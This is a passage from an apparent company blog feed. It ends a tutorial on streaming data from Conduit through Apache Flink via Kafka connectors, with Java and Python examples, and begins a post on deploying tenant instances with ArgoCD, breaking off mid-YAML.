     &lt;span class=&quot;token class-name&quot;&gt;WatermarkStrategy&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;noWatermarks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;generator-source&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;MapFunction&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; value &lt;span class=&quot;token operator&quot;&gt;-&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
     value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;put&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;processed-by&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;flink&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
     &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; value&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Adding a Sink&lt;/h3&gt;
&lt;p&gt;Now, write the data into a file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; sink &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/file-destination.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Connect and Execute&lt;/h3&gt;
&lt;p&gt;Connect the stream and trigger program execution:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;in&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;sinkTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;sink&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;execute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Conduit + Apache Flink demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Putting It All Together&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; env &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;StreamExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;String&lt;/span&gt; appId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-flink-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;KafkaSource&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.type&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;structured&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token class-name&quot;&gt;DataStream&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; in &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fromSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;WatermarkStrategy&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;noWatermarks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator-source&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;MapFunction&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; value &lt;span class=&quot;token operator&quot;&gt;-&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
   value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;put&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;processed-by&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;flink&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
   &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; value&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; sink &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/file-destination.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

in&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;sinkTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;sink&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;execute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Conduit + Apache Flink demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ensure that Conduit and Kafka are running before executing the job. Running the application will generate the following records:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;position&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;eyJHcm91cElEIjoiNTU0MTU0NTktOTQ5Ny00OWYyLTgzMGUtMjUyY2EwOTE4YTY5IiwiVG9waWMiOiJmbGluay10b3BpYy1zaW5rIiwiUGFydGl0aW9uIjowLCJPZmZzZXQiOjB9&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;processed-by&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;flink&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;key&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  	&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3758801242992936400&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  	&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;petrifier&quot;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What we see is a typical OpenCDC record. The &lt;strong&gt;.Payload.After&lt;/strong&gt; field contains an &lt;strong&gt;id&lt;/strong&gt; and a &lt;strong&gt;name&lt;/strong&gt; that were created by the generator connector. Looking at the metadata, you’ll notice &lt;strong&gt;&quot;processed-by&quot;&lt;/strong&gt;: &lt;strong&gt;&quot;flink&quot;&lt;/strong&gt;, which comes from the map function.&lt;/p&gt;
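&lt;p&gt;As an aside, the &lt;strong&gt;position&lt;/strong&gt; value above is base64-encoded JSON describing where the record sits in Kafka. A few lines of Python (a quick inspection sketch, not part of the connector) can decode it:&lt;/p&gt;

```python
import base64
import json

# The base64 "position" value from the record above.
position = (
    "eyJHcm91cElEIjoiNTU0MTU0NTktOTQ5Ny00OWYyLTgzMGUtMjUyY2EwOTE4YTY5Iiwi"
    "VG9waWMiOiJmbGluay10b3BpYy1zaW5rIiwiUGFydGl0aW9uIjowLCJPZmZzZXQiOjB9"
)

# Pad defensively: b64decode needs a length that is a multiple of 4.
decoded = json.loads(base64.b64decode(position + "=" * (-len(position) % 4)))
print(decoded)
# {'GroupID': '55415459-9497-49f2-830e-252ca0918a69', 'Topic': 'flink-topic-sink', 'Partition': 0, 'Offset': 0}
```

&lt;p&gt;This is handy when debugging which Kafka topic, partition, and offset a record came from.&lt;/p&gt;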
&lt;h3&gt;Next Steps&lt;/h3&gt;
&lt;p&gt;Examine the topics used (&lt;strong&gt;flink-topic-source&lt;/strong&gt; and &lt;strong&gt;flink-topic-sink&lt;/strong&gt;), modify the map transformation, and observe the updated results. For &lt;a href=&quot;https://github.com/conduitio-labs/conduit-flink-connector/tree/main/src/main/java/examples&quot;&gt;more examples&lt;/a&gt;, including PostgreSQL to Snowflake, visit our GitHub repository.&lt;/p&gt;
&lt;p&gt;We&apos;d love to hear your feedback on the connector. Join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussions&lt;/a&gt;, or &lt;a href=&quot;https://x.com/conduitio&quot;&gt;Twitter/X&lt;/a&gt; for more conversations!
Also, don&apos;t forget to &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1717020067958.1717083419376.75&amp;#x26;__hssc=259081301.2.1717083419376&amp;#x26;__hsfp=3065315178&quot;&gt;request a demo&lt;/a&gt; to learn about our new Conduit Platform!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Simplifying Kubernetes Deployments with ArgoCD]]></title><description><![CDATA[At Meroxa, we recently adopted ArgoCD as our go-to continuous delivery (CD) tool, allowing us to easily leverage the GitOps framework to deploy Kubernetes resources and services. We utilize ArgoCD to simplify the management of tenant instances of our platform, deployed within a Kubernetes cluster.
]]></description><link>https://meroxa.com/blog/simplifying-kubernetes-deployments-with-argocd</link><guid isPermaLink="false">https://meroxa.com/blog/simplifying-kubernetes-deployments-with-argocd</guid><dc:creator><![CDATA[Samir Ketema]]></dc:creator><pubDate>Mon, 10 Jun 2024 10:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we recently adopted &lt;a href=&quot;https://argo-cd.readthedocs.io/en/stable/&quot;&gt;ArgoCD&lt;/a&gt; as our go-to continuous delivery (CD) tool, allowing us to easily leverage the &lt;a href=&quot;https://about.gitlab.com/topics/gitops/&quot;&gt;GitOps&lt;/a&gt; framework to deploy Kubernetes resources and services. We utilize ArgoCD to simplify the management of tenant instances of our platform, deployed within a Kubernetes cluster.
Before we expand further, here’s a quick overview of how we use these technologies at Meroxa.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;ArgoCD Setup at Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;ArgoCD&apos;s primary role in our platform is to deploy and manage thousands of distinct, “mini” Conduit platform instances, which we call &apos;tenants&apos;. This setup consists of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Supervisor Application&lt;/strong&gt;: This is a &lt;em&gt;single&lt;/em&gt; ArgoCD application that creates and manages Meroxa tenants. It creates the Kubernetes namespace and ArgoCD Application for each tenant, supports deployment into private VPCs, and ensures cloud-agnostic deployments across AWS, Azure, or Google Cloud. It’s also capable of deploying the Conduit platform in air-gapped environments, as well as deploying tenants to different CPU architectures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tenant ArgoCD Applications&lt;/strong&gt;: For each tenant on the platform, an ArgoCD application is created. The tenant ArgoCD application points to a Helm chart containing all components of the tenant platform instance, including the Conduit platform, which performs Meroxa’s core stream processing. Additionally, it encapsulates ArgoCD Applications for supporting services in the tenant namespace, such as Grafana and Loki.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/e8950/tenant-argocd-final.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 107%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADOUlEQVR42oVV2Y7bRhDk//+PEb84QWxvgsB5sA3DcBbY1bWSKFG8RM5JzlSqh+Tu+oIHapCY6emuqu6msqZpsVptURQlHg457g4ldvWIsh+wrR0+XQwKO0CWtQHK0FyAHWPaG11E20VUOsKGiKwsK7y+eYs3Nzd49fsf+PfTCn/+p/Hb5wavVh1erK+4bd10mUE0g3ZmhPEB/RAQuPf5XuHLTmOkT3YtAt6/Nnj3t8Jf7xT+YbCX71u8uesTEseLXtDw54imUyOqboDmfkJNZE2tyEhD0S9TPFzfdtisDNYHi23hkDcDHiqHth9TUD8j6xms60iZ7zVRdoLQR2xPAZtyhGfWrFcDeuuSJi5MusgabEyaebK1V4O60kQWYJhkoG9rR2o7Jp+7dYn7QwMXGXAkck/NxWmJN1CMTo/UKOLK4uSbLfabDQoWKU71Ae8izJRPZ4sDde6FMr5ZIrwjjTgHV53Hntl3ZYvySiZ9wMDMIgMlJZMBH25bfLxv4eOILDLNQCSeTiPNqJDQinlGpRpw7RWma0EwsDz3w1NARQb73RG7Y05GDDh4XugNA3XoLHhx0sgNk6bGRBwfcux5wTABQTBJeJTH8/xcBeTUV0sfDkRQnk645HtWlSj97Dk/BPH51GFfXlNVF1ks/aY+BL6se9zu1dSHXlqg1ig7kxpWtSFpqIlCs2JGKDc1TFvBPNN66QcB1DQKNVky1NdFESfHdgnhaU+z9445i1LURDjiZyvO9l2Vg+hm5+mgi6OufdWjvXJywk+CibZzW2Q/dkAKaFJwoMpzXE5HWPx6Zc+DPLdlWepa1yZpbMfwjW+c7elONlCXy6WaIMdnaj9mSo3KGVY4Hk+oquY7v5g+Y5xkJsy842idzhx8BaV1Mstudt7D05xzbA12QtWiKMt0Lr7GmHQmPot+Mc0ynRU/PeP8bRPTyiSz7Bl5Oo6X1haGJucTaM4672lt0nsMMVmiXBQXbg5P5edBIAWhGcLXpY1CnxVvOI4/psxPzVHmsFcM0Ccai3Tyt1DVNZTSieKyJOCZIGRf7ixJE2WhoEhLNj2zOOsfAwpNxz2RRZ5LNUV30Vl6Vp5yvpz9D6CjZB8eJGP9AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Diagram of a Tenant ArgoCD Application. Note that there is a hierarchy, where the Conduit Platform is a child App of the Tenant ArgoCD App.&quot;
        title=&quot;&quot;
        src=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/5a190/tenant-argocd-final.png&quot;
        srcset=&quot;/static/7cdcf7740375f6283918c854dc98b7a5/772e8/tenant-argocd-final.png 200w,
/static/7cdcf7740375f6283918c854dc98b7a5/e17e5/tenant-argocd-final.png 400w,
/static/7cdcf7740375f6283918c854dc98b7a5/5a190/tenant-argocd-final.png 800w,
/static/7cdcf7740375f6283918c854dc98b7a5/c1b63/tenant-argocd-final.png 1200w,
/static/7cdcf7740375f6283918c854dc98b7a5/29007/tenant-argocd-final.png 1600w,
/static/7cdcf7740375f6283918c854dc98b7a5/e8950/tenant-argocd-final.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Diagram of a Tenant ArgoCD Application. Note that there is a hierarchy, where the Conduit Platform is a child App of the Tenant ArgoCD App.&lt;/p&gt;
&lt;p&gt;This encapsulation makes it simple to manage all of these Kubernetes resources - &lt;code class=&quot;language-text&quot;&gt;Deployments&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Pods&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Ingress&lt;/code&gt;, etc. All the supervisor application needs to do is invoke the Kubernetes API once to create the Tenant ArgoCD Application, which is provided as a &lt;a href=&quot;https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/&quot;&gt;Kubernetes Custom Resource&lt;/a&gt; by ArgoCD.&lt;/p&gt;
&lt;p&gt;The tenant ArgoCD Applications have the &lt;code class=&quot;language-text&quot;&gt;repo&lt;/code&gt; pointed to the GitHub repository hosting the Conduit Platform code. The &lt;code class=&quot;language-text&quot;&gt;path&lt;/code&gt; is pointed to a directory containing the helm chart for the specific environment - we’ll dig into that nuance further below. Lastly, the &lt;code class=&quot;language-text&quot;&gt;targetRevision&lt;/code&gt; is pointed to &lt;code class=&quot;language-text&quot;&gt;HEAD&lt;/code&gt;, so the helm chart from the latest commit is always reflected; ArgoCD syncs automatically.&lt;/p&gt;
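&lt;p&gt;As a rough sketch, a tenant Application resource wired up this way might look like the following (all names, paths, and URLs here are illustrative, not our actual configuration):&lt;/p&gt;

```yaml
# Illustrative tenant Application; every value below is hypothetical.
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: tenant-acme
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/example-org/conduit-platform  # repo hosting the charts
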